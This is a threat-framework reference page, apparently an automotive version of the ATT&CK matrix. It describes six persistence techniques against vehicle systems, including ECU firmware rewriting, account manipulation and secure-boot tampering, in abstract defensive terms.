The adversary is trying to maintain their foothold.
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.
| ID | Name | Description | |
| T2019 | Account Manipulation | Adversaries may manipulate accounts to maintain and/or elevate access to vehicle systems. This technique involves actions that preserve or modify adversary access to compromised accounts, such as modifying credentials or permission groups. By manipulating accounts, adversaries can subvert security policies and gain persistent access to vehicle systems, potentially leading to privilege escalation. | |
| T2020 | Boot or Logon Initialization Scripts | Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. This technique allows adversaries to execute commands, scripts, or binaries during the boot-up or logon process, enabling them to establish a foothold and ensure continued access to the vehicle's systems. | |
| T2021 | Modify Trusted Execution Environment | Adversaries may target the trusted execution environment, such as the vehicle's secure boot process or cryptographic keys, to modify the system's behavior and maintain their presence within the vehicle's network. By tampering with these trusted components, adversaries can ensure that their unauthorized access and control persist even after reboots or software updates. This allows them to continue malicious activities, such as intercepting or manipulating vehicle communication, compromising safety systems, or stealing sensitive data. | |
| T2022 | Rewrite ECU Image/Firmware | Adversaries may manipulate ECU image or firmware to maintain persistent access to vehicle systems. This technique involves altering the software running on the vehicle's electronic control units (ECUs) to establish a foothold and maintain control over the vehicle's functions. | |
| T2017 | Scheduled Task/Job | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system. | |
| T2011 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. | |